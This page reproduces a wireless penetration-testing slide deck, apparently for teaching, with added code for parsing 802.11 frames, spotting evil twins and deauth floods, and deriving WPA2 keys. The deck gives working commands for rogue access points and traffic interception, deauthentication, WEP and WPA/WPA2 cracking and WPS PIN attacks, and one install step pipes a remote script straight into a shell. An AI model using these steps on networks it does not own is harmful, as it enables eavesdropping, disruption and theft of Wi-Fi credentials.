Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Wireless Penetration Testing

2. Agenda
WIRELESS PENETRATION TESTING
• Lab Setup
• Wi-Fi Network Fundamentals
• Wireless Packets
• Wi-Fi Network Interaction
• Wireless Reconnaissance
• Rogue Access points
• Cracking WEP
• Cracking WPA/WPA2
• WPS Attacks
• Security Best Practices

3. Lab Setup
Hardware requirements
• TP-Link WN722N
• Alfa AWUS036H
• Melon RTL8187L
• Alfa AWUS036NHA
• Panda PAU05
• Alfa AWUS036NEH

4. Hardware of my choice for this session:
TL-WN722N Wi-Fi Adaptor

5. System Architecture
• Minimum System Configuration
• Windows 10 in Host Machine
• Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2 CPU
• Virtualisation Platform
• VirtualBox (https://www.virtualbox.org/)
(or)
• VMware (https://www.vmware.com/in/products/workstation-player/workstation-player-evaluation.html)
• OS needs to be installed inside the VM
• Kali Linux (https://www.kali.org/get-kali/#kali-platforms)

6. Software Requirements
• Aircrack-ng
• Wifite
• Bettercap
• John the Ripper
• Hashcat
• coWPAtty
• Kismet
• Fluxion
• Wi-Fi-Pumpkin
7. Wi-Fi Network Fundamentals
IEEE 802.11
• IEEE 802.11 is part of the IEEE 802 set of local area network (LAN) technical standards, and specifies the set of media access control (MAC) and physical layer (PHY) protocols for implementing wireless local area network (WLAN) computer communication.
• The standard and amendments provide the basis for wireless network products using the Wi-Fi brand and are the world's most widely used wireless computer networking standards.
• IEEE 802.11 is used in most home and office networks to allow laptops, printers, smartphones, and other devices to communicate with each other and access the Internet without connecting wires. IEEE 802.11 is also a basis for vehicle-based communication networks with IEEE 802.11p.

8. IEEE 802.11 (Contd.)
• The standards are created and maintained by the Institute of Electrical and Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802).
• The base version of the standard was released in 1997 and has had subsequent amendments. While each amendment is officially revoked when it is incorporated in the latest version of the standard, the corporate world tends to market to the revisions because they concisely denote the capabilities of their products.
• IEEE 802.11 uses various frequencies including, but not limited to, the 2.4 GHz, 5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications list channels that might be used, the radio frequency spectrum availability allowed varies significantly by regulatory domain.
• The protocols are typically used in conjunction with IEEE 802.2, are designed to interwork seamlessly with Ethernet, and are very often used to carry Internet Protocol traffic.

12. Wireless LAN: 802.11 Standards Comparison
• Wi-Fi 7 is expected to launch in the second half of 2024; currently we are using Wi-Fi 6.
14. Basic Terminologies (Contd.)
Access Point (AP)
• An AP is a networking hardware device that allows other Wi-Fi devices to connect to a wired network.
• As a standalone device, the AP may have a wired connection to a router, but in a wireless router it can also be an integral component of the router itself.
Service Set Identifier (SSID)
• A service set identifier (SSID) is a sequence of characters that uniquely names a wireless local area network (WLAN).
• An SSID is sometimes referred to as a "network name". This name allows stations to connect to the desired network when multiple independent networks operate in the same physical area.

15. Basic Terminologies (Contd.)
Basic Service Set Identifier (BSSID)
• It's the MAC (physical) address of the access point or wireless router that is used to connect to the Wi-Fi.
Extended Service Set Identifier (ESSID)
• It is a wireless network, created by multiple access points, which appears to users as a single, seamless network, such as a network covering a home or office that is too large for reliable coverage by a single access point.
Roaming
• Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and connects to a different one.

16. Basic Terminologies (Contd.)
Channel
• A Wi-Fi channel is the frequency at which your router sends out the information to your device. Most routers and devices support several bands for your Wi-Fi connection, the most popular being 5 GHz and 2.4 GHz. Each of these ranges is divided into smaller slots, which are the channels.
Data Rate
• Data rates vary with the modulation type and the number of spatial streams; for example 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps, 867 Mbps.
Beacon
• Wi-Fi beacons are relatively short, regular transmissions from access points (APs) whose purpose is to inform user devices (clients) about available Wi-Fi services and nearby access points. Clients use beacons to decide which AP to connect to.
18. Wireless Operating modes (Contd.)
• Managed - Managed mode allows you to configure your laptop or desktop system as an AP for providing connectivity to other wireless stations.
• Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices can communicate directly with each other. This type of wireless network is also called peer-to-peer mode.
• Master - When your wireless card is in master mode it acts as an access point and it actively transmits a signal.
• Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel.
• Auto - the easiest way to configure a wireless interface, and enabled by default.
19. TP-Link TL-WN722N Driver Software installation (commands are case-sensitive, run as shown):
• sudo apt update
• sudo apt upgrade
• sudo apt dist-upgrade
• sudo reboot
• sudo apt install bc
• sudo apt-get install build-essential
• sudo apt-get install libelf-dev
• sudo apt install linux-headers-amd64
• echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"
• reboot
• git clone https://github.com/aircrack-ng/rtl8188eus
• cd rtl8188eus
• sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"

20. Monitor Mode
• Start the Kali OS in VMware or VirtualBox
• Plug in the USB TP-Link wireless adapter (TL-WN722N)
• Run the following command:
• iwconfig

21. Monitor Mode (Contd.)
• By default it will be in Auto or Managed mode
• Run the following commands to switch to Monitor mode:
• airmon-ng start wlan0
• airmon-ng check kill [if any previous processes are running, do this]
• iwconfig
• To disable monitor mode run airmon-ng stop wlan0
• Restart the network manager: service network-manager start
23. Wireless Packets – IEEE 802.11 MAC Frame Structure
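The frame-structure slide above is an image on the original deck, so the fields it shows are not in the text. The decoder below is an added example (not the author's code) that walks the 24-byte 802.11 management MAC header (frame control, duration, three addresses, sequence control) and, for beacons and probe responses, the fixed fields plus the tagged information elements that the terminology slides describe: the SSID, the DS Parameter Set (channel), and the RSN or WPA elements that tell a defender whether a network is open, WEP, WPA or WPA2. The beacon and deauthentication frames it decodes are constructed in the block, with a made-up AP address, purely as test input.

```python
"""Decode IEEE 802.11 management frames: frame control, addresses and,
for beacons, the SSID / channel / security elements (added example)."""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Management-frame subtypes live in bits 4-7 of frame-control byte 0
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
IE_SSID, IE_RATES, IE_DS_PARAM, IE_RSN, IE_VENDOR = 0, 1, 3, 48, 221
WPA_OUI_TYPE = b"\x00\x50\xf2\x01"   # Microsoft OUI + type 1 = legacy WPA element
CAP_PRIVACY = 0x0010                 # capability bit: encryption required


@dataclass
class MgmtFrame:
    subtype: str
    addr1: str                       # destination address
    addr2: str                       # source address
    bssid: str                       # address 3 in management frames
    ssid: Optional[str] = None
    channel: Optional[int] = None
    security: Optional[str] = None   # OPEN / WEP / WPA / WPA2-RSN
    reason: Optional[int] = None     # deauth / disassoc reason code


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(body: bytes) -> List[Tuple[int, bytes]]:
    """Walk the tag/length/value list; refuse truncated elements."""
    ies, i = [], 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        ies.append((tag, value))
        i += 2 + length
    return ies


def parse_mgmt(frame: bytes) -> MgmtFrame:
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte MAC header")
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:        # type field (bits 2-3) must be 0 = management
        raise ValueError("not a management frame")
    subtype = MGMT_SUBTYPES.get(fc0 >> 4, f"subtype-{fc0 >> 4}")
    f = MgmtFrame(subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]))
    body = frame[24:]
    if subtype in ("beacon", "probe-resp"):
        if len(body) < 12:
            raise ValueError("beacon body too short")
        _timestamp, _interval, cap = struct.unpack("<QHH", body[:12])
        has_rsn = has_wpa = False
        for tag, value in parse_ies(body[12:]):
            if tag == IE_SSID:
                f.ssid = value.decode("utf-8", "replace")
            elif tag == IE_DS_PARAM and len(value) == 1:
                f.channel = value[0]
            elif tag == IE_RSN:
                has_rsn = True
            elif tag == IE_VENDOR and value.startswith(WPA_OUI_TYPE):
                has_wpa = True
        # Privacy bit set with no RSN/WPA element means legacy WEP
        f.security = ("WPA2-RSN" if has_rsn else "WPA" if has_wpa
                      else "WEP" if cap & CAP_PRIVACY else "OPEN")
    elif subtype in ("deauth", "disassoc"):
        if len(body) < 2:
            raise ValueError("reason code missing")
        f.reason = struct.unpack("<H", body[:2])[0]
    return f


# --- constructed test frames (made-up addresses, not captured traffic) -------
def _ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value

AP = bytes.fromhex("001122334455")
BCAST = b"\xff" * 6
RSN_CCMP_PSK = bytes.fromhex("0100000fac040100000fac040100000fac020000")

def _beacon(ssid: bytes, channel: int, cap: int, extra: bytes = b"") -> bytes:
    header = b"\x80\x00\x00\x00" + BCAST + AP + AP + b"\x10\x00"
    body = struct.pack("<QHH", 0, 100, cap)      # timestamp, interval, capabilities
    return (header + body + _ie(IE_SSID, ssid) + _ie(IE_RATES, b"\x82\x84\x8b\x96")
            + _ie(IE_DS_PARAM, bytes([channel])) + extra)

WPA2_BEACON = _beacon(b"tplink", 11, 0x0411, _ie(IE_RSN, RSN_CCMP_PSK))
WEP_BEACON = _beacon(b"hello", 11, 0x0011)
DEAUTH = (b"\xc0\x00\x3a\x01" + bytes.fromhex("aabbccddeeff") + AP + AP
          + b"\x00\x00" + struct.pack("<H", 7))

if __name__ == "__main__":
    for raw in (WPA2_BEACON, WEP_BEACON, DEAUTH):
        print(parse_mgmt(raw))
```

The security label comes from two places the slides do not spell out: the Privacy capability bit alone means WEP, while WPA and WPA2 announce themselves through a vendor-specific or RSN element, so an inventory built from beacons can flag WEP and open networks directly. Feeding real frames needs a monitor-mode capture and radiotap stripping, which the block leaves out.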
  • 30. WPA2 Personal and Enterprise
33. Wireless Reconnaissance
• Tools required: Bettercap, airodump-ng and Kismet
• In Bettercap, run the following commands
• Choose the interface first: bettercap --iface wlan0
• help wifi
• wifi.recon on
• wifi.show
• wifi.recon off

35. Wardriving with Kismet (Just for reference)
• This can only be achieved while moving (driving or roaming) in a vehicle across multiple locations, capturing Wi-Fi hotspots together with GPS information.
• Hardware required: Car, Laptop, Android Phone, Wi-Fi Adapter
• Software required: Kismet, GPSD, ADB, Share GPS (Android app), Google Earth
• Reference blog link: https://veteransec.org/wifi-hacking-wardriving-with-an-android-phone-and-raspberry-pi-3/
38. Rogue Access point requirements
• Tools required: airodump-ng, airbase-ng, airmon-ng and Wi-Fi Pumpkin 3
• Wi-Fi Pumpkin 3 installation
• git clone https://github.com/P0cL4bs/wifipumpkin3
• https://wifipumpkin3.github.io/docs/getting-started#installation
• dnsmasq
• apt-get install dnsmasq -y

39. Creation of Rogue AP using Wi-Fi Pumpkin 3
• Plug in the wireless adapter; monitor mode does not need to be enabled. Run the following commands:
• wifipumpkin3
• set interface wlan0
• set ssid hello
• set proxy noproxy
• start
• It will create a rogue AP named Hello

40. Creation of Rogue AP using Wi-Fi Pumpkin 3 (Contd.)
• Once any device is connected to the rogue AP "Hello" we can intercept the traffic of the connected clients easily. (Evil twin attack)

41. Creation of Rogue AP using Air-ng tools
• airodump-ng wlan0
• airbase-ng -c 11 -e tplink -s -W 1 wlan0
• airodump-ng -c 11 --bssid bssidoftplinknewlycreated -w 1 wlan0
• For an evil twin / MITM attack we need dnsmasq
• airbase-ng -e TP-Link -c 8 wlan0 [create fake AP for evil twin attack]
• The at0 interface is created; edit the dnsmasq configuration with geany /etc/dnsmasq.conf:
  interface=at0
  dhcp-range=10.0.0.10,10.0.0.250,12h
  dhcp-option=3,10.0.0.1
  dhcp-option=6,10.0.0.1
  server=8.8.8.8
  log-queries
  log-dhcp
  listen-address=127.0.0.1

42. Creation of Rogue AP using Air-ng tools (Contd.)
Run the commands below in a separate terminal
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect any device now; the traffic can be seen
44. Cracking WEP
Create a rogue access point with the WEP cipher
• airbase-ng -c 11 -e hello -w 31:32:33:34:35 wlan0
Use the same dnsmasq config here
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect a device to the WEP fake AP
• airodump-ng wlan0 [to check whether the fake AP is up or not]

45. Cracking WEP (Contd.)
• Deauthentication attack with aireplay-ng
• aireplay-ng --deauth 0 -a macaddressoffakeAP -c macaddressofclientconnected wlan0
• Deauthentication attack with bettercap
• bettercap --iface wlan0
• wifi.recon on and wifi.show
• wifi.deauth macaddressoffakeAP
• Macchanger
• ifconfig wlan0 down
• macchanger -r wlan0
• ifconfig wlan0 up

46. Cracking WEP (Contd.)
• airodump-ng to dump the WEP capture file
• airodump-ng -c 11 --bssid macaddfakeAP -w wepcrack wlan0
• Fake authentication
• aireplay-ng --fakeauth 60 -e hello -a macaddresfakeAP -h macaddressofwlan0 wlan0
• ARP request replay attack
• aireplay-ng --arpreplay -e hello -a macaddfakeAP -h macaddrwlan0 wlan0
• Again perform the deauth attack
• aireplay-ng --deauth 0 -a macaddfakeAP -c macaddrclientconnected wlan0
• Stop the deauth
• Crack the captured WEP file using aircrack-ng
• aircrack-ng wepcrack-01.cap [it will crack the WEP key; airodump-ng writes the capture with the -01 suffix]

48. Cracking the WEP dump file using aircrack-ng
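The evil twin (slide 40) and the deauthentication attack (slide 45) are the two events a wireless IDS is most often asked to catch, and both are visible in management frames alone. The block below is an added example, not part of the deck, of the defender's side: it takes already-decoded frames (timestamp, subtype, BSSID, SSID) and flags beacons that advertise one of the organisation's SSIDs from a BSSID outside its inventory, and bursts of deauth/disassoc frames per BSSID inside a sliding time window. The authorized inventory, the addresses and the frame records are all constructed for the example.

```python
"""Defender-side checks over decoded 802.11 management frames: evil-twin
beacons and deauthentication floods (added example on constructed records)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple


@dataclass(frozen=True)
class Frame:
    ts: float        # capture time in seconds
    subtype: str     # "beacon", "probe-resp", "deauth", "disassoc", ...
    bssid: str
    ssid: str = ""   # only meaningful for beacon / probe-resp


def find_evil_twins(frames: Iterable[Frame],
                    authorized: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """(ssid, bssid) pairs advertising one of our SSIDs from an AP that is not
    in the authorized inventory. Unknown SSIDs are ignored: they are not ours."""
    suspicious = set()
    for f in frames:
        if f.subtype in ("beacon", "probe-resp") and f.ssid in authorized:
            if f.bssid.lower() not in authorized[f.ssid]:
                suspicious.add((f.ssid, f.bssid.lower()))
    return sorted(suspicious)


def deauth_bursts(frames: Iterable[Frame], window: float = 10.0,
                  threshold: int = 20) -> Dict[str, int]:
    """Per BSSID, the largest count of deauth/disassoc frames inside any
    'window' seconds; BSSIDs whose peak reaches 'threshold' are returned."""
    times: Dict[str, List[float]] = defaultdict(list)
    for f in frames:
        if f.subtype in ("deauth", "disassoc"):
            times[f.bssid.lower()].append(f.ts)
    alerts: Dict[str, int] = {}
    for bssid, ts in times.items():
        ts.sort()
        start, peak = 0, 0
        for end, t in enumerate(ts):
            while t - ts[start] > window:   # advance the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts


# Constructed sample: one legitimate AP, one impostor on the same SSID, and a
# burst of 40 deauth frames in two seconds carrying the legitimate AP's address.
AUTHORIZED = {"tplink": {"00:11:22:33:44:55"}}
SAMPLE = (
    [Frame(i * 0.05, "deauth", "00:11:22:33:44:55") for i in range(40)]
    + [Frame(5.0, "deauth", "66:77:88:99:aa:bb"), Frame(50.0, "deauth", "66:77:88:99:aa:bb")]
    + [Frame(1.0, "beacon", "00:11:22:33:44:55", "tplink"),
       Frame(1.1, "beacon", "de:ad:be:ef:00:01", "tplink"),
       Frame(1.2, "beacon", "66:77:88:99:aa:bb", "guest")]
)

if __name__ == "__main__":
    print("evil twins:", find_evil_twins(SAMPLE, AUTHORIZED))
    print("deauth bursts:", deauth_bursts(SAMPLE))
```

Two caveats matter when this runs on a real monitor-mode feed. A deauth flood carries the address of the AP being attacked, not of the sender, so the alert names the victim BSSID and an attacker is located by signal strength, not by address. And the evil-twin check is only as good as the inventory: an SSID that is not in the authorized map is never flagged, so every production BSSID has to be listed.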
54. Capture the WPA/WPA2 Handshake file
• Run the following commands:
• airmon-ng start wlan0 [put the wireless adapter in Monitor mode]
• airodump-ng wlan0 [listen to all the APs which are alive]
• airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture the wpacracking handshake file with airodump-ng]
• Force a reconnection (the manual equivalent of a deauthentication attack) by disconnecting and reconnecting your mobile device to that AP
• aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt [pass the wordlist with the handshake file]
  • 55. Capture the WPA/WPA2 Handshake file(Contd.)
56. Cracking WPA/WPA2 using John the Ripper
• john --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking-01.cap

57. Cracking WPA/WPA2 using Wifite
• wifite --wpa
• Before starting the attack, connect a client device

59. Cracking WPS (PIN attacks)
• wifite --wps [using Wifite]
• reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 -K [using Reaver]
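What aircrack-ng, John the Ripper and Wifite are doing on slides 54 to 57 is deriving the Pairwise Master Key from each wordlist candidate and checking it against the captured four-way handshake. The derivation itself is small and worth seeing, because it is also the reason the "Security Best Practices" slide matters: the block below is an added example (written from the 802.11i definition, not taken from any of the page's tools) that computes the WPA/WPA2-Personal PMK with Python's hashlib and again by hand from RFC 2898's block function, so the two can be compared, and enforces the standard's 8-to-63 printable-ASCII passphrase rule. The check value is the published IEEE 802.11i test vector for passphrase "password" and SSID "IEEE".

```python
"""WPA/WPA2-Personal PMK derivation: PBKDF2-HMAC-SHA1 with the SSID as salt,
4096 rounds, 32-byte output (added example, not the deck's code)."""
import hashlib
import hmac
import struct


def check_passphrase(passphrase: str) -> bytes:
    """802.11i allows 8..63 printable ASCII characters for a PSK passphrase."""
    if not (8 <= len(passphrase) <= 63) or not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return passphrase.encode("ascii")


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096, 32 bytes), via hashlib."""
    return hashlib.pbkdf2_hmac("sha1", check_passphrase(passphrase), ssid.encode(), 4096, 32)


def _pbkdf2_block(password: bytes, salt: bytes, rounds: int, index: int) -> bytes:
    """One PBKDF2 output block: the XOR of 'rounds' chained HMAC values
    (the F() function of RFC 2898), seeded with salt || big-endian index."""
    u = hmac.new(password, salt + struct.pack(">I", index), hashlib.sha1).digest()
    acc = bytearray(u)
    for _ in range(rounds - 1):
        u = hmac.new(password, u, hashlib.sha1).digest()
        for i, b in enumerate(u):
            acc[i] ^= b
    return bytes(acc)


def wpa2_pmk_manual(passphrase: str, ssid: str) -> bytes:
    """The same derivation spelled out: SHA1 gives 20-byte blocks, so two
    blocks are computed and the 40 bytes are truncated to 32."""
    pw, salt = check_passphrase(passphrase), ssid.encode()
    return (_pbkdf2_block(pw, salt, 4096, 1) + _pbkdf2_block(pw, salt, 4096, 2))[:32]


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector
    print(wpa2_pmk("password", "IEEE").hex())
    print(wpa2_pmk_manual("password", "IEEE") == wpa2_pmk("password", "IEEE"))
```

Two defensive points fall out of the code. The SSID is the salt, so a PMK table precomputed for one network name (the kind of table coWPAtty can build ahead of time) is useless against any other name, which is why a unique SSID, rather than a vendor default, is worth having. And 4096 HMAC rounds is the only cost an offline guess pays, so the wordlist attacks on these slides succeed or fail on passphrase length and randomness alone; nothing about the handshake capture can be hardened on the AP side short of moving to WPA3 or 802.1X (slide 30's Enterprise mode).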
  • 60. Next-Gen Wireless Assessment tools Wi-Fi Pineapple
61. Security Best Practices
• Change default passwords
• Restrict access to authorized users
• Encrypt the data on your network
• Protect your Service Set Identifier (SSID)
• Install a firewall
• Maintain antivirus software
• Use file sharing with caution
• Keep your access point software patched and up to date
• Check your internet provider's or router manufacturer's wireless security options
• Connect using a Virtual Private Network (VPN)
Reference blog link: https://www.cisa.gov/uscert/ncas/tips/ST05-003